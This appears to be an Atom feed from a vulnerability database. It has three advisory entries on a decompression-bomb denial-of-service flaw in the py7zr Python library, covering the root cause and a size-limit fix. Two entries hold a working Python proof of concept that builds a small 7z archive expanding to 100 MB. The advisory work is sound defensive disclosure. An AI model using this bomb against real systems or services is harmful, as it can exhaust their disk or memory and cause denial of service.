<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-05T21:12:26.939040+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/brew-aqtinstall-cve-2026-55195</id>
    <title>BREW-aqtinstall-CVE-2026-55195 — py7zr: Decompression bomb (zip bomb) denial of service via unchecked extraction size</title>
    <updated>2026-10-05T21:12:26.942915+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> Homebrew: aqtinstall</p>
<p>py7zr's `Worker.decompress()` extracts archive entries without tracking total decompressed size. A crafted `.7z` file can exhaust disk or memory before the extraction completes.</p>
<p>Measured: 15.6 KB archive → 100 MB output (6,556:1 ratio).</p>
<p>**Proof of concept:**</p>
<p>```python
import py7zr, tempfile, os</p>
<p># create bomb: compress 100MB of zeros into ~15KB
bomb_path = tempfile.mktemp(suffix='.7z')
with py7zr.SevenZipFile(bomb_path, 'w') as z:
    import io
    z.writef(io.BytesIO(b'\x00' * 100 * 1024 * 1024), 'bomb.bin')</p>
<p>print(f'archive size: {os.path.getsize(bomb_path):,} bytes')</p>
<p># extract — no size check
with py7zr.SevenZipFile(bomb_path, 'r') as z:
    z.extractall(path=tempfile.mkdtemp())</p>
<p>print('extracted 100 MB from ~15 KB archive')
```</p>
<p>**Root cause:** `Worker.decompress()` in `py7zr/worker.py` writes decompressed data directly to disk without a running total or configurable size limit. There is no equivalent of Python's `zipfile` `max_size` parameter.</p>
<p>**Fix:** track cumulative decompressed bytes and raise before writing if a limit is exceeded:</p>
<p>```python
MAX_EXTRACT_SIZE = 2 * 1024 ** 3  # 2 GB default, configurable</p>
<p>total = 0
for chunk in decompressed_chunks:
    total += len(chunk)
    if total &gt; MAX_EXTRACT_SIZE:
        raise py7zr.exceptions.DecompressionBombError(
            f'Extraction aborted: decompressed size exceeded {MAX_EXTRACT_SIZE} bytes'
        )
    outfile.write(chunk)
```</p>
<p>Tested on py7zr 0.22.0, Python 3.12, Ubuntu 22.04.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/brew-aqtinstall-cve-2026-55195"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/cve-2026-55195</id>
    <title>CVE-2026-55195 — py7zr: Decompression bomb (zip bomb) denial of service via unchecked extraction size</title>
    <updated>2026-10-05T21:12:26.942988+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> miurahr py7zr</p>
<p>py7zr is a Python-based library and utility to support 7zip archive compression, decompression, encryption and decryption. Prior to 1.1.3, py7zr's Worker.decompress() extracted archive entries without tracking total decompressed size, allowing a crafted .7z file such as a 15.6 KB archive that expands to 100 MB to exhaust disk or memory before extraction completes. This issue is fixed in version 1.1.3.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/cve-2026-55195"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-gjrg-mpp7-g774</id>
    <title>GHSA-gjrg-mpp7-g774 — py7zr: Decompression bomb (zip bomb) denial of service via unchecked extraction size</title>
    <updated>2026-10-05T21:12:26.943019+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> PyPI: py7zr</p>
<p>py7zr's `Worker.decompress()` extracts archive entries without tracking total decompressed size. A crafted `.7z` file can exhaust disk or memory before the extraction completes.</p>
<p>Measured: 15.6 KB archive → 100 MB output (6,556:1 ratio).</p>
<p>**Proof of concept:**</p>
<p>```python
import py7zr, tempfile, os</p>
<p># create bomb: compress 100MB of zeros into ~15KB
bomb_path = tempfile.mktemp(suffix='.7z')
with py7zr.SevenZipFile(bomb_path, 'w') as z:
    import io
    z.writef(io.BytesIO(b'\x00' * 100 * 1024 * 1024), 'bomb.bin')</p>
<p>print(f'archive size: {os.path.getsize(bomb_path):,} bytes')</p>
<p># extract — no size check
with py7zr.SevenZipFile(bomb_path, 'r') as z:
    z.extractall(path=tempfile.mkdtemp())</p>
<p>print('extracted 100 MB from ~15 KB archive')
```</p>
<p>**Root cause:** `Worker.decompress()` in `py7zr/worker.py` writes decompressed data directly to disk without a running total or configurable size limit. There is no equivalent of Python's `zipfile` `max_size` parameter.</p>
<p>**Fix:** track cumulative decompressed bytes and raise before writing if a limit is exceeded:</p>
<p>```python
MAX_EXTRACT_SIZE = 2 * 1024 ** 3  # 2 GB default, configurable</p>
<p>total = 0
for chunk in decompressed_chunks:
    total += len(chunk)
    if total &gt; MAX_EXTRACT_SIZE:
        raise py7zr.exceptions.DecompressionBombError(
            f'Extraction aborted: decompressed size exceeded {MAX_EXTRACT_SIZE} bytes'
        )
    outfile.write(chunk)
```</p>
<p>Tested on py7zr 0.22.0, Python 3.12, Ubuntu 22.04.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-gjrg-mpp7-g774"/>
  </entry>
</feed>
